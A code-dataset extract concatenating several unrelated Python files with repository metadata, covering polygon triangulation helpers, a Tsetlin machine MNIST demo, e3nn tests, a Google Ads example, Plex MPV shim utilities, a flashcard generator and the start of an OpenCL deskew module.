def _contains_no_points(p1, p2, p3, polygon):
    """True when no polygon vertex other than p1/p2/p3 lies inside triangle (p1, p2, p3)."""
    corners = (p1, p2, p3)
    return all(
        vertex in corners or not _is_point_inside(vertex, p1, p2, p3)
        for vertex in polygon
    )
def _is_point_inside(p, a, b, c):
    """Return True when point ``p`` lies inside (or on) triangle ``(a, b, c)``.

    ``p`` is inside iff the three sub-triangles it forms with the edges cover
    exactly the area of the whole triangle.  BUG FIX: the original compared the
    floating-point areas with exact ``==``; rounding in the four area
    computations can make the sums differ in the last bits, spuriously
    reporting "outside" and letting a bad ear through.  Compare with a
    tolerance instead.
    """
    area = _triangle_area(a.x, a.y, b.x, b.y, c.x, c.y)
    area1 = _triangle_area(p.x, p.y, b.x, b.y, c.x, c.y)
    area2 = _triangle_area(p.x, p.y, a.x, a.y, c.x, c.y)
    area3 = _triangle_area(p.x, p.y, a.x, a.y, b.x, b.y)
    # rel_tol handles large coordinates; abs_tol covers the degenerate
    # near-zero-area case where a relative comparison breaks down.
    return math.isclose(area, area1 + area2 + area3, rel_tol=1e-09, abs_tol=1e-12)
def _triangle_area(x1, y1, x2, y2, x3, y3):
    """Unsigned area of the triangle with the given vertex coordinates."""
    cross = x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)
    return abs(cross / 2.0)
def _triangle_sum(x1, y1, x2, y2, x3, y3):
    """Signed orientation value of a vertex triple (negative = counter-clockwise turn)."""
    total = x1 * (y3 - y2)
    total += x2 * (y1 - y3)
    total += x3 * (y2 - y1)
    return total
| 31.052632
| 120
| 0.591243
|
4a15a1edd9e9b860f6dcbd13ac78aba5b2cf676b
| 786
|
py
|
Python
|
examples/MNISTDemo.py
|
anjapago/pyTsetlinMachine
|
74ab0f4bed8620899ac371ac930ddbab50463b96
|
[
"MIT"
] | 101
|
2019-06-14T13:03:28.000Z
|
2022-03-20T17:01:44.000Z
|
examples/MNISTDemo.py
|
anjapago/pyTsetlinMachine
|
74ab0f4bed8620899ac371ac930ddbab50463b96
|
[
"MIT"
] | 6
|
2019-09-17T06:30:37.000Z
|
2021-07-30T00:12:46.000Z
|
examples/MNISTDemo.py
|
anjapago/pyTsetlinMachine
|
74ab0f4bed8620899ac371ac930ddbab50463b96
|
[
"MIT"
] | 28
|
2019-06-14T12:59:51.000Z
|
2022-03-13T21:43:10.000Z
|
from pyTsetlinMachine.tm import MultiClassTsetlinMachine
import numpy as np
from time import time
from keras.datasets import mnist

# Flatten 28x28 images and binarise pixels at intensity threshold 75 —
# Tsetlin machines operate on boolean features.
(X_train, Y_train), (X_test, Y_test) = mnist.load_data()
X_train = np.where(X_train.reshape((X_train.shape[0], 28*28)) > 75, 1, 0)
X_test = np.where(X_test.reshape((X_test.shape[0], 28*28)) > 75, 1, 0)

# Hyperparameters (2000, 50, 10.0) — presumably clauses / threshold T /
# specificity s; confirm against the pyTsetlinMachine documentation.
tm = MultiClassTsetlinMachine(2000, 50, 10.0)

print("\nAccuracy over 250 epochs:\n")
for i in range(250):
    start_training = time()
    # incremental=True keeps learned state between the one-epoch fit calls.
    tm.fit(X_train, Y_train, epochs=1, incremental=True)
    stop_training = time()
    start_testing = time()
    result = 100*(tm.predict(X_test) == Y_test).mean()
    stop_testing = time()
    print("#%d Accuracy: %.2f%% Training: %.2fs Testing: %.2fs" % (i+1, result, stop_training-start_training, stop_testing-start_testing))
| 31.44
| 135
| 0.71883
|
4a15a237314356cad80f58f570300b1228038e00
| 708
|
py
|
Python
|
audiovisual/indico_audiovisual/views.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
audiovisual/indico_audiovisual/views.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
audiovisual/indico_audiovisual/views.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
# This file is part of the CERN Indico plugins.
# Copyright (C) 2014 - 2020 CERN
#
# The CERN Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License; see
# the LICENSE file for more details.
from __future__ import unicode_literals
from indico.core.plugins import WPJinjaMixinPlugin
from indico.web.breadcrumbs import render_breadcrumbs
from indico.web.views import WPDecorated
from indico_audiovisual import _
class WPAudiovisualManagers(WPJinjaMixinPlugin, WPDecorated):
    """Page wrapper for the Webcast/Recording manager area."""

    def _get_breadcrumbs(self):
        # Single breadcrumb naming the section.
        return render_breadcrumbs(_('Webcast/Recording'))

    def _get_body(self, params):
        # Delegate rendering to the Jinja mixin's template machinery.
        return self._get_page_content(params)
| 30.782609
| 65
| 0.785311
|
4a15a24fb59621e1303318d22788608bb02ae4d8
| 1,782
|
py
|
Python
|
tests/image/convolution_test.py
|
sophiaas/e3nn
|
92351b9225df7aeaf70fdc124c7b0e566d4c0eda
|
[
"MIT"
] | 1
|
2021-01-11T18:34:39.000Z
|
2021-01-11T18:34:39.000Z
|
tests/image/convolution_test.py
|
sophiaas/e3nn
|
92351b9225df7aeaf70fdc124c7b0e566d4c0eda
|
[
"MIT"
] | null | null | null |
tests/image/convolution_test.py
|
sophiaas/e3nn
|
92351b9225df7aeaf70fdc124c7b0e566d4c0eda
|
[
"MIT"
] | null | null | null |
# pylint: disable=not-callable, no-member, invalid-name, line-too-long, wildcard-import, unused-wildcard-import, missing-docstring, protected-access
import pytest
import torch
from e3nn import rs
from e3nn.image.convolution import Convolution
@pytest.mark.parametrize('fuzzy_pixels', [False, True])
def test_equivariance(fuzzy_pixels):
    """A Convolution stack must be equivariant to 90-degree in-plane rotations.

    The network output of a rotated input, rotated back, must match the output
    of the unrotated input (up to a tolerance that depends on fuzzy_pixels).
    """
    torch.set_default_dtype(torch.float64)
    f = torch.nn.Sequential(
        Convolution(
            Rs_in=[0],
            Rs_out=[0, 0, 1, 1, 2],
            size=5,
            steps=(0.5, 0.5, 0.9),
            fuzzy_pixels=fuzzy_pixels
        ),
        Convolution(
            Rs_in=[0, 0, 1, 1, 2],
            Rs_out=[0],
            size=5,
            steps=(0.5, 0.5, 0.9),
            fuzzy_pixels=fuzzy_pixels
        ),
    )

    def rotate(t):
        # rotate 90 degrees in plane of axes 1 and 2
        return t.flip(1).transpose(1, 2)

    def unrotate(t):
        # undo the rotation by 3 more rotations
        return rotate(rotate(rotate(t)))

    inp = torch.randn(2, 16, 16, 16, 1)
    inp_r = rotate(inp)
    diff_inp = (inp - unrotate(inp_r)).abs().max().item()
    assert diff_inp < 1e-10  # sanity check

    out = f(inp)
    out_r = f(inp_r)
    diff_out = (out - unrotate(out_r)).abs().max().item()
    # BUG FIX: the original `assert diff_out < 1e-1 if fuzzy_pixels else 1e-10`
    # parsed as `assert ((diff_out < 1e-1) if fuzzy_pixels else 1e-10)`, so for
    # fuzzy_pixels=False it asserted the truthy constant 1e-10 and always passed.
    tolerance = 1e-1 if fuzzy_pixels else 1e-10
    assert diff_out < tolerance
@pytest.mark.parametrize('fuzzy_pixels', [False, True])
def test_normalization(fuzzy_pixels):
    """A single Convolution layer should produce roughly unit-variance output."""
    batch, size, input_size = 3, 5, 15
    Rs_in = [(20, 0), (20, 1), (10, 2)]
    Rs_out = [0, 1, 2]

    conv = Convolution(Rs_in, Rs_out, size, lmax=2, fuzzy_pixels=fuzzy_pixels)
    features = rs.randn(batch, input_size, input_size, input_size, Rs_in)
    output = conv(features)

    # Last dimension carries the representation channels.
    assert output.shape[-1] == rs.dim(Rs_out)
    # log10(var) within +/-1.5 of 0, i.e. variance within ~[0.03, 30].
    assert output.var().log10().abs() < 1.5
| 27
| 148
| 0.59596
|
4a15a2cb792fd88a139b1cd0f34c72ac58e66737
| 2,155
|
py
|
Python
|
examples/adwords/v201806/basic_operations/remove_keyword.py
|
christineyi3898/googleads-python-lib
|
cd707dc897b93cf1bbb19355f7424e7834e7fb55
|
[
"Apache-2.0"
] | 2
|
2019-07-11T13:01:56.000Z
|
2019-07-11T13:01:58.000Z
|
examples/adwords/v201806/basic_operations/remove_keyword.py
|
SoungMo/googleads-python-lib
|
fe86335c416e0571328c0a481c4b0cff863c01d9
|
[
"Apache-2.0"
] | null | null | null |
examples/adwords/v201806/basic_operations/remove_keyword.py
|
SoungMo/googleads-python-lib
|
fe86335c416e0571328c0a481c4b0cff863c01d9
|
[
"Apache-2.0"
] | 1
|
2019-10-21T04:10:51.000Z
|
2019-10-21T04:10:51.000Z
|
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example deletes an ad group criterion using the 'REMOVE' operator.
To get ad group criteria, run get_keywords.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
from googleads import adwords
# Placeholder IDs: replace with real values (see get_keywords.py) before running.
AD_GROUP_ID = 'INSERT_AD_GROUP_ID_HERE'
CRITERION_ID = 'INSERT_CRITERION_ID_HERE'
def main(client, ad_group_id, criterion_id):
    """Remove one biddable ad group criterion (keyword) and report the result.

    Args:
        client: an initialized AdWordsClient.
        ad_group_id: id of the ad group holding the criterion.
        criterion_id: id of the criterion to remove.
    """
    # Initialize appropriate service.
    criterion_service = client.GetService(
        'AdGroupCriterionService', version='v201806')

    # A single REMOVE operation targeting the criterion within its ad group.
    remove_operation = {
        'operator': 'REMOVE',
        'operand': {
            'xsi_type': 'BiddableAdGroupCriterion',
            'adGroupId': ad_group_id,
            'criterion': {
                'id': criterion_id
            }
        }
    }
    result = criterion_service.mutate([remove_operation])

    # Display results.
    for criterion in result['value']:
        print ('Ad group criterion with ad group id "%s", criterion id "%s", '
               'and type "%s" was deleted.'
               % (criterion['adGroupId'], criterion['criterion']['id'],
                  criterion['criterion']['Criterion.Type']))
if __name__ == '__main__':
    # Initialize client object.
    # Credentials are read from ~/googleads.yaml by default.
    adwords_client = adwords.AdWordsClient.LoadFromStorage()
    main(adwords_client, AD_GROUP_ID, CRITERION_ID)
| 31.691176
| 77
| 0.697448
|
4a15a352db763b40def66f138c7d0ce317ec0ab2
| 4,541
|
py
|
Python
|
plex_mpv_shim/utils.py
|
romosborne/plex-mpv-shim
|
a454459e6a5b584f40841331604c8bfdf26d6c51
|
[
"MIT"
] | 231
|
2019-08-18T06:25:17.000Z
|
2022-03-28T08:35:50.000Z
|
plex_mpv_shim/utils.py
|
romosborne/plex-mpv-shim
|
a454459e6a5b584f40841331604c8bfdf26d6c51
|
[
"MIT"
] | 64
|
2019-08-18T00:40:36.000Z
|
2022-03-30T07:05:38.000Z
|
plex_mpv_shim/utils.py
|
romosborne/plex-mpv-shim
|
a454459e6a5b584f40841331604c8bfdf26d6c51
|
[
"MIT"
] | 20
|
2019-08-19T21:02:36.000Z
|
2022-03-12T15:07:38.000Z
|
import logging
import os
import urllib.request, urllib.parse, urllib.error
import socket
import ipaddress
import uuid
import re
import sys
from .conf import settings
from datetime import datetime
from functools import wraps
# Matches Plex auth tokens embedded in URLs/log lines so they can be redacted.
PLEX_TOKEN_RE = re.compile("(token|X-Plex-Token)=[^&]*")
log = logging.getLogger("utils")

# Per-server-domain caches: ephemeral auth tokens, client session ids,
# and transcode session ids.
plex_eph_tokens = {}
plex_sessions = {}
plex_transcode_sessions = {}
class Timer(object):
    """Measures wall-clock time elapsed since creation or the last restart()."""

    def __init__(self):
        self.restart()

    def restart(self):
        # Reset the reference instant to "now".
        self.started = datetime.now()

    def elapsed(self):
        delta = datetime.now() - self.started
        return delta.total_seconds()

    def elapsedMs(self):
        return self.elapsed() * 1e3
def synchronous(tlockname):
    """
    A decorator to place an instance based lock around a method.

    ``tlockname`` names the instance attribute holding the lock; the lock is
    held for the duration of the wrapped call and always released.
    From: http://code.activestate.com/recipes/577105-synchronization-decorator-for-class-methods/
    """
    def _synched(func):
        @wraps(func)
        def _synchronizer(self, *args, **kwargs):
            tlock = self.__getattribute__(tlockname)
            # Lock objects are context managers: acquire/release is automatic.
            with tlock:
                return func(self, *args, **kwargs)
        return _synchronizer
    return _synched
def upd_token(domain, token):
    # Store/refresh the ephemeral Plex token for this server domain.
    plex_eph_tokens[domain] = token
def get_transcode_session(domain, create=True):
    """Return the transcode-session id for ``domain``.

    A new uuid4 id is generated on first use; with ``create=False`` the lookup
    is read-only and returns None when no session exists yet.
    """
    if not create:
        return plex_transcode_sessions.get(domain)
    return plex_transcode_sessions.setdefault(domain, str(uuid.uuid4()))
def clear_transcode_session(domain):
    """Forget the transcode session for ``domain`` (no-op when absent)."""
    plex_transcode_sessions.pop(domain, None)
def get_session(domain):
    """Return the per-domain client session id, creating one on first use."""
    return plex_sessions.setdefault(domain, str(uuid.uuid4()))
def get_plex_url(url, data=None, quiet=False):
    """Append auth token and standard X-Plex client headers to ``url`` as query params.

    Raises ValueError for non-HTTPS URLs unless HTTP is enabled in settings.
    ``data`` (optional dict) supplies extra query parameters and is mutated
    in place with the X-Plex fields before being urlencoded.
    """
    if not data:
        data = {}
    parsed_url = urllib.parse.urlsplit(url)
    domain = parsed_url.hostname
    if parsed_url.scheme != "https" and not settings.allow_http:
        raise ValueError("HTTP is not enabled in the configuration.")
    # Attach the cached ephemeral token for this server, if we have one.
    if domain in plex_eph_tokens:
        data.update({
            "X-Plex-Token": plex_eph_tokens[domain]
        })
    else:
        log.error("get_plex_url No token for: %s" % domain)
    # Standard client-identification headers Plex expects on every request.
    data.update({
        "X-Plex-Version": "2.0",
        "X-Plex-Client-Identifier": settings.client_uuid,
        "X-Plex-Provides": "player",
        "X-Plex-Device-Name": settings.player_name,
        "X-Plex-Model": "RaspberryPI",
        "X-Plex-Device": "RaspberryPI",
        "X-Plex-Session-Identifier": get_session(domain),

        # Lies
        "X-Plex-Product": "Plex MPV Shim",
        "X-Plex-Platform": "Plex Home Theater",
        "X-Plex-Client-Profile-Name": settings.client_profile,
    })

    # Kinda ghetto...
    # Pick '?' or '&' depending on whether the URL already has a query string.
    sep = "?"
    if sep in url:
        sep = "&"

    if data:
        url = "%s%s%s" % (url, sep, urllib.parse.urlencode(data))

    if not quiet:
        # Token is redacted by sanitize_msg() before logging.
        log.debug("get_plex_url Created URL: %s" % sanitize_msg(url))

    return url
def safe_urlopen(url, data=None, quiet=False):
    """
    Opens a url and returns True if an HTTP 200 code is returned,
    otherwise returns False.
    """
    if not data:
        data = {}
    # Decorate the URL with token/client parameters before fetching.
    url = get_plex_url(url, data, quiet)
    try:
        page = urllib.request.urlopen(url)
        if page.code == 200:
            return True
        log.error("Error opening URL '%s': page returned %d" % (sanitize_msg(url),
                                                                page.code))
    except Exception as e:
        # Deliberately best-effort: any failure (network, HTTP error, etc.)
        # is logged and reported as False rather than raised.
        log.error("Error opening URL '%s': %s" % (sanitize_msg(url), e))
    return False
def is_local_domain(domain):
    """True when ``domain`` resolves to a private/loopback-range IPv4 address."""
    resolved_ip = socket.gethostbyname(domain)
    return ipaddress.ip_address(resolved_ip).is_private
def sanitize_msg(text):
    """Redact Plex auth tokens from ``text`` when sanitising is enabled."""
    if not settings.sanitize_output:
        return text
    return PLEX_TOKEN_RE.sub("\\1=REDACTED", text)
def mpv_color_to_plex(color):
    """Convert an mpv '#AARRGGBB' color string to Plex's lowercase '#rrggbb'."""
    # Drop the '#AA' alpha prefix and lowercase the remaining RGB digits.
    return "#{}".format(color.lower()[3:])
def plex_color_to_mpv(color):
    """Convert a Plex '#rrggbb' color string to mpv's '#AARRGGBB' (opaque alpha)."""
    return "#FF{}".format(color.upper()[1:])
def get_resource(*path):
    """Return the absolute path of a bundled resource file.

    Works both from a normal checkout and from a PyInstaller bundle, which
    exposes its extraction directory via ``sys._MEIPASS``.
    From: https://stackoverflow.com/questions/404744/
    """
    bundle_dir = getattr(sys, '_MEIPASS', False)
    if bundle_dir:
        application_path = os.path.join(bundle_dir, "plex_mpv_shim")
    else:
        application_path = os.path.dirname(os.path.abspath(__file__))
    return os.path.join(application_path, *path)
| 28.030864
| 97
| 0.62211
|
4a15a40433bbc8d5b38312bbc0045eafe68fb949
| 484
|
py
|
Python
|
aoc/day02_2.py
|
GitOnUp/Advent2021
|
c9cd5a2d38a09389bdecac5f45be854da7aacee8
|
[
"MIT"
] | null | null | null |
aoc/day02_2.py
|
GitOnUp/Advent2021
|
c9cd5a2d38a09389bdecac5f45be854da7aacee8
|
[
"MIT"
] | null | null | null |
aoc/day02_2.py
|
GitOnUp/Advent2021
|
c9cd5a2d38a09389bdecac5f45be854da7aacee8
|
[
"MIT"
] | null | null | null |
from aoc.day02_1 import yield_lines
def run():
    """Advent of Code 2021 day 2 part 2: product of final position and depth.

    'forward' moves horizontally and dives by aim * value; 'down'/'up'
    adjust the aim. Any other command is rejected.
    """
    horizontal = depth = aim = 0
    for command, amount in yield_lines():
        if command == 'forward':
            horizontal += amount
            depth += aim * amount
        elif command == 'down':
            aim += amount
        elif command == 'up':
            aim -= amount
        else:
            raise ValueError("Bad line")
    return horizontal * depth
if __name__ == "__main__":
    # Allow running this solution directly as a script.
    print(run())
| 21.043478
| 42
| 0.52686
|
4a15a5a870f96c1d003dff3a367dcde30d4d86d3
| 3,979
|
py
|
Python
|
mtcnn_pb2.py
|
reasonsolo/mtcnn_caffe
|
ec646c8e27af900da1380d5968970705f9e8f582
|
[
"MIT"
] | null | null | null |
mtcnn_pb2.py
|
reasonsolo/mtcnn_caffe
|
ec646c8e27af900da1380d5968970705f9e8f582
|
[
"MIT"
] | null | null | null |
mtcnn_pb2.py
|
reasonsolo/mtcnn_caffe
|
ec646c8e27af900da1380d5968970705f9e8f582
|
[
"MIT"
] | 1
|
2019-01-15T05:56:06.000Z
|
2019-01-15T05:56:06.000Z
|
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: mtcnn.proto
# NOTE(review): machine-generated module — regenerate with protoc instead of
# editing by hand.  Defines a single message `Datum` (image bytes, label,
# bbox/landmark floats, and width/height/channel ints).

import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()


DESCRIPTOR = _descriptor.FileDescriptor(
  name='mtcnn.proto',
  package='',
  syntax='proto2',
  serialized_options=None,
  serialized_pb=_b('\n\x0bmtcnn.proto\"b\n\x05\x44\x61tum\x12\x0b\n\x03img\x18\x01 \x01(\x0c\x12\r\n\x05label\x18\x02 \x01(\x05\x12\x0c\n\x04\x62\x62ox\x18\x03 \x03(\x02\x12\x0e\n\x06landm5\x18\x04 \x03(\x02\x12\t\n\x01w\x18\x05 \x01(\x05\x12\t\n\x01h\x18\x06 \x01(\x05\x12\t\n\x01\x63\x18\x07 \x01(\x05')
)


_DATUM = _descriptor.Descriptor(
  name='Datum',
  full_name='Datum',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='img', full_name='Datum.img', index=0,
      number=1, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=_b(""),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='label', full_name='Datum.label', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='bbox', full_name='Datum.bbox', index=2,
      number=3, type=2, cpp_type=6, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='landm5', full_name='Datum.landm5', index=3,
      number=4, type=2, cpp_type=6, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='w', full_name='Datum.w', index=4,
      number=5, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='h', full_name='Datum.h', index=5,
      number=6, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='c', full_name='Datum.c', index=6,
      number=7, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=15,
  serialized_end=113,
)

DESCRIPTOR.message_types_by_name['Datum'] = _DATUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

Datum = _reflection.GeneratedProtocolMessageType('Datum', (_message.Message,), dict(
  DESCRIPTOR = _DATUM,
  __module__ = 'mtcnn_pb2'
  # @@protoc_insertion_point(class_scope:Datum)
  ))
_sym_db.RegisterMessage(Datum)


# @@protoc_insertion_point(module_scope)
| 305
| 0.723046
|
4a15a6bae52d6a6586d909db70e48e2d696c645b
| 6,621
|
py
|
Python
|
py/add_card.py
|
Apop85/Lernkarten
|
ff092f4f856d50b56802333ad599789bbc0fb387
|
[
"MIT"
] | null | null | null |
py/add_card.py
|
Apop85/Lernkarten
|
ff092f4f856d50b56802333ad599789bbc0fb387
|
[
"MIT"
] | null | null | null |
py/add_card.py
|
Apop85/Lernkarten
|
ff092f4f856d50b56802333ad599789bbc0fb387
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
####
# File: search_all.py
# Project: py
#-----
# Created Date: Thursday 08.08.2019, 23:52
# Author: rbald
#-----
# Last Modified: Tuesday 19.10.2021, 18:24
#-----
# Copyright (c) 2019 rbald
# This software is published under the MIT license.
# Check http://www.opensource.org/licenses/MIT for further informations
#-----
# Description: Search working directory for docx files and get Questions out of them
####
try:
import os, docx, hashlib
from sys import argv
except:
print("<div class='output_message error'>Fehlendes Pythonmodul: python-docx</div>")
exit()
DEBUG = True
def get_root():
# Konfigurationsdatei einlesen
os.chdir(os.path.dirname(__file__))
rel_dir = "../conf/cards.ini"
file_reader = open(rel_dir, 'r')
file_content = file_reader.readlines()
file_reader.close()
for line in file_content:
if "ROOT_PATH" in line:
ROOT_PATH = line.lstrip('ROOT_PATH="')
ROOT_PATH = ROOT_PATH.rstrip('"\n')
elif "DOK_PATH" in line:
DOK_PATH = line.lstrip('DOK_PATH="')
DOK_PATH = DOK_PATH.rstrip('"\n')
elif "QUESTION_START" in line:
LINE_START = line.lstrip('QUESTION_START="')
LINE_START = LINE_START.rstrip('"\n')
elif "SEPERATOR" in line:
SEPERATOR = line.lstrip('SEPERATOR="')
SEPERATOR = SEPERATOR.rstrip('"\n')
return ROOT_PATH, DOK_PATH, LINE_START, SEPERATOR
ROOT_PATH, DOK_PATH, LINE_START, SEPERATOR = get_root()
def search_all(doc_directory):
# Alle docx Dateien im angegebenen Ordner finden
result_list = []
os.chdir(doc_directory)
file_list = os.walk(doc_directory)
for foldername in file_list:
for filename in foldername[2]:
if filename.endswith("docx") and not filename.endswith("beispiel.docx"):
writeLogfile(filename, "search_all")
result_list += [foldername[0]+"\\"+filename]
process_files(result_list)
def process_files(array, ignore=0):
# Erstelle Fragen-Array
found_questions = {}
for name in array:
found_questions = process_dox(found_questions, name)
create_files(found_questions)
def process_dox(found_questions, name):
# Lese jede Zeile aus dem Worddokument aus und prüfe diese auf das Suchmuster
try:
doc_file = docx.Document(name)
for i in range(len(doc_file.paragraphs)):
if LINE_START+SEPERATOR in doc_file.paragraphs[i].text:
raw_question = doc_file.paragraphs[i].text
raw_question = raw_question.lstrip(LINE_START+SEPERATOR).split(SEPERATOR)
writeLogfile(raw_question, "process_dox")
found_questions.setdefault(raw_question[0], [])
found_questions[raw_question[0]] += [(raw_question[1], raw_question[2], name)]
except:
pass
return found_questions
def create_files(questions, root_dir = ROOT_PATH):
# Erstelle Files anhand der gefundenen Daten
count=0
writeLogfile(questions, "create_file")
for fach in questions.keys():
if "/" in fach:
temp_array = []
path = fach.split("/")
for entry in path:
temp_array += [entry.capitalize()]
path = "/".join(temp_array)
else:
path = fach.capitalize()
writeLogfile(root_dir+"/cards/"+path, "create_file")
if not os.path.exists(root_dir+"/cards/"+path):
os.mkdir(root_dir+"/cards/"+path)
current_dir = root_dir+"/cards/"+path
for frage in questions[fach]:
# Generiere Dateiname aus Hashwert der Frage
filename = hashlib.md5(bytes(frage[0], "utf-8"))
filename = filename.hexdigest()+".php"
if not os.path.exists(current_dir+"\\"+filename):
writeLogfile(current_dir+"\\"+filename, "create_file")
question = '"'+frage[0]+'"'
answer = '"'+frage[1]+'"'
file_path = '"'+frage[2]+'"'
file_path = file_path.split("\\")
file_path = "/".join(file_path)
writeLogfile("Q:{} A:{} P:{}".format(question, answer, file_path), "create_file")
output = "<?php\n\t$q = {};\n\t$a = {};\n\t$f = {};\n\t$s = 0;\n\t$ra = 0;\n\t$fa = 0;\n?>".format(question, answer, file_path)
file_writer = open(current_dir+"/"+filename, "w", encoding="utf-8")
file_writer.write(output)
file_writer.close()
count+=1
print("<div class='output_message good'>Karteikarten erstellt: "+str(count)+'</div>')
def search_folder():
    """Scan every document below the directory passed as argv[2]."""
    folder = argv[2]
    writeLogfile(folder, "search_folder")
    # Shell quoting may leave a trailing double quote on the argument.
    if folder.endswith('"'):
        folder = folder.strip('"')
    if not (os.path.exists(folder) and os.path.isdir(folder)):
        print("<div class='output_message error'>Pfad ungültig "+argv[2]+"</div>")
    else:
        search_all(doc_directory=folder)
def search_file():
    """Scan the single document passed as argv[2] and create its cards."""
    filename = argv[2]
    writeLogfile(filename, "search_file")
    # Shell quoting may leave a trailing double quote on the argument.
    if filename.endswith('"'):
        filename = filename.strip('"')
    if not (os.path.exists(filename) and os.path.isfile(filename)):
        print("<div class='output_message error'>Dateipfad ungültig"+argv[2]+"</div>")
    else:
        create_files(process_dox({}, filename))
def add_data(root_dir = ROOT_PATH+"\\cards"):
    """Create a single card manually from argv: question, answer, subject."""
    writeLogfile(root_dir, "add_data")
    # Guard clause: the target subject folder must already exist.
    if not os.path.exists(root_dir+'\\'+argv[4]):
        print("<div class='output_message error'>Fehlerhafte Ordnerangabe</div>")
        return
    fach, frage, antwort = argv[4], argv[2], argv[3]
    if fach and frage and antwort:
        create_files({fach: [(frage, antwort, "Manuell erstellt")]})
    else:
        print("<div class='output_message error'>Fehlende Angaben</div>")
# search_all(DOK_PATH)
def writeLogfile(message, origin):
    """Append ``message`` to the debug logfile, tagged with its origin.

    No-op unless the module-level DEBUG flag is set.

    :param message: any object; converted to text via str.format
    :param origin: name of the calling function, used as the log tag
    """
    if DEBUG:
        # "with" guarantees the handle is closed even if the write raises
        # (the original leaked the handle on failure).
        with open(r"C:\xampp\htdocs\lernkarten\logfile.log", "a+", encoding="utf-8") as file_writer:
            file_writer.write("{}: {}\n".format(origin, message))
# Command-line dispatch: argv[1] selects the operation
# (all = scan default folder, dir = scan argv[2], file = single document,
#  manadd = create one card from argv[2..4]).
if argv[1] == "all":
    search_all(DOK_PATH)
elif argv[1] == "dir":
    search_folder()
elif argv[1] == "file":
    search_file()
elif argv[1] == "manadd":
    add_data()
# elif argv[1] == "test":
#     print('<div class="output_message info">test erfolgreich</div>')
| 35.983696
| 143
| 0.601722
|
4a15a78a4e97ed01a99cbb2170187b67fd9da1b1
| 11,660
|
py
|
Python
|
napari_ndtiffs/affine.py
|
adamltyson/napari-ndtiffs
|
dcb00e68dedb0d3a618fe1dc47135051b82b1db8
|
[
"BSD-3-Clause"
] | null | null | null |
napari_ndtiffs/affine.py
|
adamltyson/napari-ndtiffs
|
dcb00e68dedb0d3a618fe1dc47135051b82b1db8
|
[
"BSD-3-Clause"
] | null | null | null |
napari_ndtiffs/affine.py
|
adamltyson/napari-ndtiffs
|
dcb00e68dedb0d3a618fe1dc47135051b82b1db8
|
[
"BSD-3-Clause"
] | null | null | null |
"""Deskew utilities"""
import logging
from functools import lru_cache
import numpy as np
logger = logging.getLogger(__name__)
cl = None
try:
import pyopencl as cl
from pyopencl.array import empty, to_device
logger.info("Using pyopencl for affine transforms")
except ImportError:
try:
from scipy.ndimage.interpolation import affine_transform
logger.warning(
"Could not import pyopencl. "
"Falling back to scipy for CPU affine transforms"
)
except ImportError:
logger.warning(
"Could not import pyopencl or scipy."
"Cannot perform deskew. Please install one of those packages."
)
affine_transform = None
affine_source = """
#ifndef SAMPLER_FILTER
#define SAMPLER_FILTER CLK_FILTER_LINEAR
#endif
#ifndef SAMPLER_ADDRESS
#define SAMPLER_ADDRESS CLK_ADDRESS_CLAMP
#endif
#ifndef DTYPE
#define DTYPE float
#endif
__kernel void affine3D(__read_only image3d_t input, __global DTYPE *output,
__constant float *mat) {
